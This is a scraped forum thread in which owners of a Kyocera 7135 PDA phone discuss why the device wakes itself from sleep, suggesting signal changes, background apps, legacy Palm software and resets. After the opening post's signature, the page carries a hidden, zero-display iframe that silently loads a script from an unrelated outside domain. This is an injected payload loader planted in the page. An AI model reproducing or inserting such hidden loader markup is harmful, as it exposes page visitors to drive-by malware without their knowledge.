+ Reply to Thread
Page 1 of 2 1 2 LastLast

My phone turns itself on, is this common?

Being that this is my first post let me thank everyone who has posted such great information about the phone. You guys and gals rock! I love the phone and it was worth every penny.

Now let me start complaining. When my phone powers off automatically (sleep mode) it quickly turns itself on for no apparent reason. The screen lights up (with no application showing) and when I have the headset on I can hear it power up. It only does this when the phone is on so I'm sure it's related to that. If I have the pda on only it doesn't do it. I've run through all the settings and can't find what I might have checked. It is sporadic and I haven't figured out a pattern to when it turns on.

Has anyone else had this problem? Any suggestions would be appreciated.

Thanks,

Big Ben<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: My phone turns itself on, is this common?

Originally posted by benmont1
    When my phone powers off automatically (sleep mode) it quickly turns itself on for no apparent reason.
    Why don't you have it dress in something less revealing?

Sorry, I couldn't resist. I'm sure someone here can answer your question.

Good luck,

Tracey

Re: My phone turns itself on, is this common?

Originally posted by benmont1
    it quickly turns itself on
    This phone is so sexy it turns itself on.
    If at first you don't succeed, don't try sky diving.

Ok, seriously now

Ben, maybe it's because the phone signal is weak, and the phone wakes up because it lost, then re-acquired service. I've seen this happen on my 6035 before.

Administrator
    definatey a possibility. also, do you have any apps on the phone that would need internet connectivity and could be set to log on aut9omatically?

Originally posted by marctronixx
    definatey a possibility. also, do you have any apps on the phone that would need internet connectivity and could be set to log on aut9omatically?
    That could be the case too... Some ppl have used a FedEx PQA that did that. The little bugger!

But in any scenario, I still don't see why it would wake up only in phone mode. Have you done a soft reset? Maybe that will clear it up.

Thanks for the suggestions.

My phone will turn on even when I have full signal strength in my office so I don't think it's related to that.

I don't have any internet aps that would be activating. I had a Treo and it used to do that when it went looking for email.

I don't think I have any aps that would be causing the phone to act up only because I only use the 7135 as a phone/pda and not a Internet tool.

I'm still vexed but the phone has been such a cool toy that I can overlook this I guess if it's not happening to anyone else maybe I'll stumble across something.

Thanks again for all the suggestions.

Big Ben

Administrator
    you can always do a cold boot and leave it with no user installed apps on it to see if it still will do it on its own.

also, when did you notice this? it was not clear (atleast to me ) in your post.

I noticed the problem the first time I used it.

I will try your suggestion and see if it works after a hard restart. I am a previous palm user so there could be any number of programs from my old 505 that's causing the problem.

Thanks for the suggestion.

Ben

Administrator
    ooh if you synced up from an old palm database then its a good chance its from one of those apps from that. legacy app on this hybrid device can bring the 7135 to is knees...

My phone also does this (turns the screen on for no apparent reason) whenever there is any change in cell service. So, the other question about signal is, could you be switching between analog and digital, or switching between two different towers? (At my home, there are two towers which I acquire randomly, or depending on the wind, or whatever, so I see service changes with little change in signal level frequently.)

This may be out of place, but my 6035 also wakes up from time to time. It is neither due to change of signal or analog/digital, nor because of SnapperMail or Crony/Eudora. It is, in fact, somewhat peculiar in that the entire wake-up-switch-off cycle lasts about 10 seconds, way less than my "auto-off after one minute" option. I had put it down as one of the idiosyncracies (read "undocumented mysteries") of the 6035, and have been comforting myself that the battery drain is not worth complaining about!

Folks,

One problem with the 6035 was that it could not be powered off as a cell phone. You could turn it off, but it always powered itseld back on -- I know this from every flight I took during the last two years. When the flight landed the phone was already on and the battery was dead.

Now the 7135 is better. I have taken 10 flights since I got it where I had to turn off the phone side. Two times, the 7135 phone side was on when I landed. With the 6035 it was pretty much every time.

Of course, this is a violation of FAA rules -- but in reality, a cell phone turned on during flight is not a real problem.

Glenn

Administrator
    Originally posted by glenn_butler
    Folks,

One problem with the 6035 was that it could not be powered off as a cell phone. You could turn it off, but it always powered itseld back on --
    i cant agree with that. i have had this phone since its inception on sprint and when i turned it off (the few times i ever turned the phone part off--movies, meetings..) it stayed off.

Both my (former) 6035 and 7135 have always stayed off when off and never "turned themselves on".
    ~'kito
    pdaPhoneHome Moderator

Marc and Markito are correct. The phone should never turn itself back on, unless you use the Auto power on feature.

I have owned both the 6035 and the 7135, and both have never came back on when I had shut the phone off ...

From the last few posts I have to clarify my problem. The phone flashes on and off. Similar to flicking a light switch on and off. It doesn't stay on. My problem is that I know the phone shouldn't be doing this and more importantly I can hear it flash on and off when I'm wearing my headset. The sound is similar to what you hear just before you receive a call. With every cell phone I've had, when you have the headset on you can hear the phone power up before the phone rings. This is what I hear in the 7135 except that it is accompanied by a flash of the light on the screen.

Big Ben

Phone Switch?

I wonder if it could be the the switch or contact thatthat the phone uses to go into its hibernate mode?

Maybe there an obstruction or damaged?

Mine seems to be working, , even after a slight (4') drop

Any progress?

Big Ben - did you ever find a solution? Both my husband and I have 7135's. His started powering itself on recently. He got his phone in June/July but we went on vacation and it started acting up.

Because we were driving in parts of the country with no signal, my husband drained the battery - he forgot that it was on and searching for a non-existent signal chewed up the battery.

Then, as it was charging (now completely drained - he lost everything - just like a hard reset), the phone kept turning itself on. And, since we were still without a signal, it wouldn't hold much of a charge.

After a few more hard resets and fully charging it when we got home, he hasn't had the problem (of course, we're in full coverage area now).

But, of course, he went on a trip this weekend, had no coverage, and it did it again - turned itself on.

Did you ever find any clues about why this was happening? Anyone know if the upgrade will help resolve this?